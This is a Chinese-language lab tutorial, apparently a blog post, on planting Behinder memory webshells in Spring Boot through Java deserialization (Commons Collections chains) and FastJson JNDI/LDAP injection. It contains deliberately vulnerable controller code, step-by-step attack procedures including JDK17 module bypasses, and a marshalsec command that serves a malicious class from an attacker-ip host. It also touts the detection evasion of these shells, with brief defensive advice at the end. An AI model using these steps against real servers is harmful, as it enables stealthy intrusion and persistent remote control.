反序列化攻击与内存马注入技术详解<\/h1>

1. 为什么要进行内存马注入<\/h2>

传统的反序列化攻击通常以"弹计算器"作为验证成功的标志，但这在实际攻击中存在局限性：<\/p>

命令执行结果不可见<\/strong>：攻击者无法直接看到命令执行结果，因为结果只在服务器端呈现<\/li>

反弹shell的缺陷<\/strong>：

反弹shell的流量特征明显<\/li>
容易被安全设备检测和拦截<\/li> <\/ul> <\/li> <\/ol>
内存马注入的优势：<\/p>

直接在目标服务器内存中植入Webshell<\/li>
冰蝎马等工具提供加密流量，规避检测<\/li>
无文件落地，隐蔽性高<\/li> <\/ul>
2. 靶场环境搭建（SpringBoot2 + JDK8）<\/h2>
2.1 项目配置<\/h3>
Maven项目配置（pom.xml）：<\/p>
<properties><\/span> <\/span><\/span> <maven.compiler.source><\/span>8<\/maven.compiler.source><\/span> <\/span><\/span> <maven.compiler.target><\/span>8<\/maven.compiler.target><\/span> <\/span><\/span> <spring-boot-dependencies.version><\/span>2.7.2<\/spring-boot-dependencies.version><\/span> <\/span><\/span><\/properties><\/span> <\/span><\/span> <\/span><\/span><dependencies><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.springframework.boot<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>spring-boot-starter-web<\/artifactId><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>commons-collections<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>commons-collections<\/artifactId><\/span> <\/span><\/span> <version><\/span>3.2.1<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span><\/dependencies><\/span> <\/span><\/span> <\/span><\/span><dependencyManagement><\/span> <\/span><\/span> <dependencies><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.springframework.boot<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>spring-boot-dependencies<\/artifactId><\/span> <\/span><\/span> <version><\/span>${spring-boot-dependencies.version}<\/version><\/span> <\/span><\/span> <type><\/span>pom<\/type><\/span> <\/span><\/span> <scope><\/span>import<\/scope><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <\/dependencies><\/span> <\/span><\/span><\/dependencyManagement><\/span> <\/span><\/span><\/code><\/pre>2.2 核心代码实现<\/h3> SpringBoot启动类：<\/p> package<\/span> org.example;<\/span> <\/span><\/span>import<\/span> org.springframework.boot.SpringApplication;<\/span> <\/span><\/span>import<\/span> org.springframework.boot.autoconfigure.SpringBootApplication;<\/span> <\/span><\/span> <\/span><\/span>@SpringBootApplication<\/span> <\/span><\/span>public<\/span> class<\/span> DemoApplication<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> SpringApplication.<\/span>run<\/span>(<\/span>DemoApplication.<\/span>class<\/span>,<\/span> args);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>Controller类（存在反序列化漏洞）：<\/p> package<\/span> org.example.controller;<\/span> <\/span><\/span>import<\/span> org.springframework.web.bind.annotation.PostMapping;<\/span> <\/span><\/span>import<\/span> org.springframework.web.bind.annotation.RestController;<\/span> <\/span><\/span>import<\/span> java.io.ByteArrayInputStream;<\/span> <\/span><\/span>import<\/span> java.io.ObjectInputStream;<\/span> <\/span><\/span>import<\/span> java.util.Base64;<\/span> <\/span><\/span> <\/span><\/span>@RestController<\/span> <\/span><\/span>public<\/span> class<\/span> DemoController<\/span> {<\/span> <\/span><\/span> @PostMapping<\/span>(<\/span>"\/Behinder"<\/span>)<\/span> <\/span><\/span> public<\/span> String hello<\/span>(<\/span>String data)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> byte<\/span>[]<\/span> decodedBytes =<\/span> Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>data);<\/span> <\/span><\/span> Object object =<\/span> deserialize(<\/span>decodedBytes);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>object);<\/span> <\/span><\/span> return<\/span> "冰蝎马测试"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> private<\/span> Object deserialize<\/span>(<\/span>byte<\/span>[]<\/span> bytes)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> try<\/span> (<\/span>ByteArrayInputStream bais =<\/span> new<\/span> ByteArrayInputStream(<\/span>bytes);<\/span> <\/span><\/span> ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>bais))<\/span> {<\/span> <\/span><\/span> return<\/span> ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. 内存马注入实战<\/h2> 3.1 使用JMG工具生成冰蝎马<\/h3> 步骤：<\/p> 下载JMG工具（Java Memory Shell Generator）<\/li> 选择Tomcat作为中间件（SpringBoot默认使用Tomcat）<\/li> 关键配置<\/strong>：必须勾选AbstractTranslet<\/code>选项（CC链依赖）<\/li> 设置冰蝎马的Class文件路径<\/li> <\/ol> 3.2 生成恶意序列化数据<\/h3> 示例代码（需根据实际情况修改）：<\/p> \/\/ 使用CC链生成恶意序列化数据 <\/span><\/span><\/span>\/\/ 注意替换实际的Class文件路径 <\/span><\/span><\/span><\/code><\/pre>3.3 攻击步骤<\/h3> 将生成的bin文件进行Base64编码<\/li> 对Base64结果进行URL编码（必须步骤）<\/li> 构造HTTP请求发送到目标端点\/Behinder<\/code><\/li> 忽略服务器可能的报错响应<\/li> <\/ol> 3.4 连接验证<\/h3> 使用冰蝎客户端连接：<\/p> 地址：目标服务器地址<\/li> 密码：默认冰蝎密码或自定义密码<\/li> 注意选择正确的加密方式和请求头<\/li> <\/ul> 4. JDK17环境下的解决方案<\/h2> 4.1 问题分析<\/h3> JDK17引入了模块化系统，导致反序列化受限：<\/p> 调用者模块和被调用者模块必须相同<\/li> 或调用者模块与Object类所在模块相同<\/li> <\/ul> 4.2 解决方案<\/h3> 使用SpringBoot3 + JDK17环境<\/p> <\/li> JMG生成冰蝎马时：<\/p> 选择jakarta<\/code>监听器（高版本包名变化）<\/li> 注入器包名必须是org.apache.commons.collections.functors<\/code>的子类<\/li> 勾选ByPass JDK Module<\/code>选项<\/li> <\/ul> <\/li> 攻击流程：<\/p> 生成Base64编码的恶意数据<\/li> 发送请求（500或200响应都可能成功）<\/li> 使用冰蝎连接验证<\/li> <\/ul> <\/li> <\/ol> 5. LDAP打马技术<\/h2> 5.1 适用场景<\/h3> FastJson 1.2.24及以下版本<\/li> Log4j2漏洞<\/li> 需要外连的JNDI注入场景<\/li> <\/ul> 5.2 环境搭建<\/h3> 添加FastJson依赖：<\/li> <\/ol> <dependency><\/span> <\/span><\/span> <groupId><\/span>com.alibaba<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>fastjson<\/artifactId><\/span> <\/span><\/span> <version><\/span>1.2.24<\/version><\/span> <\/span><\/span><\/dependency><\/span> <\/span><\/span><\/code><\/pre> 修改Controller：<\/li> <\/ol> @PostMapping<\/span>(<\/span>"\/fastjson"<\/span>)<\/span> <\/span><\/span>public<\/span> String fastjson<\/span>(<\/span>@RequestBody<\/span> String data)<\/span> {<\/span> <\/span><\/span> JSON.<\/span>parse<\/span>(<\/span>data);<\/span> \/\/ 存在反序列化漏洞 <\/span><\/span><\/span><\/span> return<\/span> "FastJson Test"<\/span>;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>5.3 攻击步骤<\/h3> 编写恶意Class（BehinderTest）并编译<\/li> 开启HTTP服务托管class文件<\/li> 使用marshalsec搭建LDAP服务器： java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http:\/\/attacker-ip:8000\/#BehinderTest"<\/span> 7777<\/span> <\/span><\/span><\/code><\/pre><\/li> 构造恶意请求触发LDAP查询<\/li> 目标服务器加载并执行恶意类<\/li> 使用冰蝎连接内存马<\/li> <\/ol> 5.4 高版本JDK8绕过<\/h3> 对于JDK8u191+版本：<\/p> 使用本地工厂类绕过<\/li> 限制：SpringBoot版本不能太高（某些版本修复了此问题）<\/li> 需要自定义攻击Payload<\/li> <\/ol> 6. 防御建议<\/h2> 升级JDK到最新版本<\/li> 使用安全的反序列化库或禁用危险功能<\/li> 对输入数据进行严格过滤<\/li> 部署RASP等运行时防护<\/li> 监控异常网络流量和内存行为<\/li> <\/ol> 7. 工具列表<\/h2> JMG (Java Memory Shell Generator) - 内存马生成工具<\/li> marshalsec - JNDI攻击工具<\/li> 冰蝎 - 加密Webshell管理工具<\/li> ysoserial - 反序列化Payload生成工具<\/li> <\/ol> 8. 注意事项<\/h2> 所有技术仅用于合法授权测试<\/li> 实际攻击中需要考虑流量加密和混淆<\/li> 不同中间件需要选择对应的内存马类型<\/li> 高版本环境需要特殊处理模块化限制<\/li> 测试前务必做好环境隔离<\/li> <\/ol>